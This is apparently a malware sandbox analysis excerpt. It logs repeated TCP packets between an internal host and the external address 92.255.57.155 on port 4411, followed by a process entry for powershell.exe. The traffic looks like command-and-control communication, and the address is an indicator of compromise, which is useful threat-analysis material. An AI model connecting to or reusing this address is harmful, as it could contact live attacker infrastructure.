Dec 29, 2024 09:50:46.362452030 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.481901884 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.482012987 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.601465940 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.638103962 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.757576942 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.757618904 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.859637976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.876965046 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:46.877131939 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:46.996491909 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.069868088 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.070657969 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.190884113 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.192303896 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.207036018 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.264231920 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.322906971 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.324337006 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.401350021 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.401427984 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.484435081 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.488303900 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.520744085 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.533206940 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.577227116 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.648483038 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:47.648608923 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:47.768457890 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.162862062 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.163875103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.283226967 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.341264009 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.460592985 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.482157946 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.601433992 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.601489067 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.721096992 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.721149921 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.793145895 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.793200016 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.840790033 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.840867996 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:48.912488937 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:48.960290909 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.003676891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.004491091 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:49.123193979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.123728991 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.124073029 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:49.243333101 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.333291054 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.337934017 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:49.453859091 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.456587076 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:49.457189083 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.575984955 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:49.576066971 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:49.695404053 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.185286999 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.304502964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.372524977 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.491916895 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.491974115 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.611361980 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.611416101 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.636898994 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.762767076 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.772397995 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.772449017 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.891715050 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:50.891769886 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:50.892560959 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.052529097 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.052603960 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.101243019 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.172059059 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.179347038 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.298604965 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.355958939 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.362068892 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.481441975 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.485255003 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.509171009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.575259924 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.648452044 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.648617983 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.692003012 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.763637066 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.768022060 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.769311905 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:51.892700911 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.983669043 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:51.988006115 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.107547998 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.153625011 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.273025990 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.273077965 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.392797947 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.466319084 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.585700035 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.585743904 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.619465113 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.619513988 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.738960981 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.739017963 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.796384096 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.796451092 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.912440062 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.912616014 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:52.915606976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:52.915757895 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.032021999 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.032069921 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.125986099 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.126035929 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.151452065 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.159354925 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.242702007 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.245309114 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.251343966 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.278872013 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.361998081 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.370687008 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.371088028 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.455858946 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.490480900 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.490731001 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.581276894 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.610078096 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.611663103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.700978041 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.731070042 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.731328964 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.820746899 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.850694895 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:53.850886106 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:53.970185041 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:54.325913906 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:54.445513964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:54.560615063 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:54.679924011 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:54.700638056 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:54.777633905 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:54.819960117 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:54.820055962 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:54.939369917 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:54.939410925 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.030677080 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.030725956 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.058765888 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.058820963 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.150155067 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.178122044 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.269248962 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.275244951 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.394553900 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.394886971 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.514189959 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.522806883 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.527332067 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.605115891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.700474977 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.700544119 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:55.820030928 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.902792931 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:55.903635979 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:56.022985935 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.263199091 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:56.382430077 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.382522106 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:56.501882076 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.501930952 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:56.621269941 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.622577906 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:56.714701891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.741890907 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.741940022 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:56.861234903 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.925185919 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:56.925894022 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:57.045329094 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.071896076 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.072633982 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:57.178951025 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.179347038 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:57.232450962 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.235445976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:57.255964041 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.298625946 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.298726082 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:57.354747057 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:57.417990923 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:58.231785059 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:58.351149082 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:58.683506012 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:58.684333086 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:58.803694963 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:59.106870890 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:59.226265907 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:59.355346918 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:59.478255033 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:59.981864929 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:59.996072054 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:59.996114969 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:59.996217966 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:00.101341009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.101454020 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:00.220752954 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.278757095 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:00.398185968 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.433840990 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.435976982 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:00.596462965 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.596529007 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:00.715800047 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.730443001 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.731439114 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:00.892421007 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:00.892472029 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.011733055 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.052735090 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.053668976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.172944069 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.222593069 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.223505974 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.342757940 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.342885971 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.383481979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.462213993 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.462274075 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.581569910 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.582303047 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.701715946 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.851191044 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:01.852299929 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:01.972635984 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.013084888 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:02.132690907 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.138015985 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:02.142200947 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.300381899 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.300447941 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:02.419754982 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.465884924 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.466845989 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:02.586657047 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.630455971 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.644798040 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:02.905721903 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:02.905836105 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.038661957 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.158076048 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.158119917 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.277492046 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.393244028 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.512567043 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.513096094 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.632411003 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.665530920 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.666430950 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.828594923 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.875638008 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.876501083 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.995868921 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:03.995994091 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:03.996284008 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.075287104 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.156414032 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.159384012 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.278810978 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.278862953 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.398222923 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.466125965 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.504595041 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.575329065 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.585464001 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.585520983 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.704919100 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.706229925 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.715167999 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.762778044 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.796051025 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.796098948 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.868629932 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.868680000 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:04.915509939 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:04.925368071 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.028398037 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.028444052 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.125988960 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.126044035 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.147810936 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.147864103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.182843924 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.183423042 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.267383099 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.271369934 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.336381912 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.448564053 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.451332092 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.570759058 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.572643042 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.575347900 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.740381956 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.743417978 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.781289101 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.781351089 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.862730980 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.862868071 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:05.900643110 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:05.905297995 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:06.024409056 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:06.024480104 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:06.144088984 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:06.270170927 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:06.372179985 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:06.480650902 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:06.559689999 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:06.693300009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:06.872175932 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:29.367465973 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:29.419224977 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:38.504452944 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:38.623760939 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:38.623814106 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:38.743067980 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:38.955889940 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:51:38.997235060 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:51:39.634541035 CET	49730	4411	192.168.2.4	92.255.57.155

Target ID:	0
Start time:	03:48:55
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
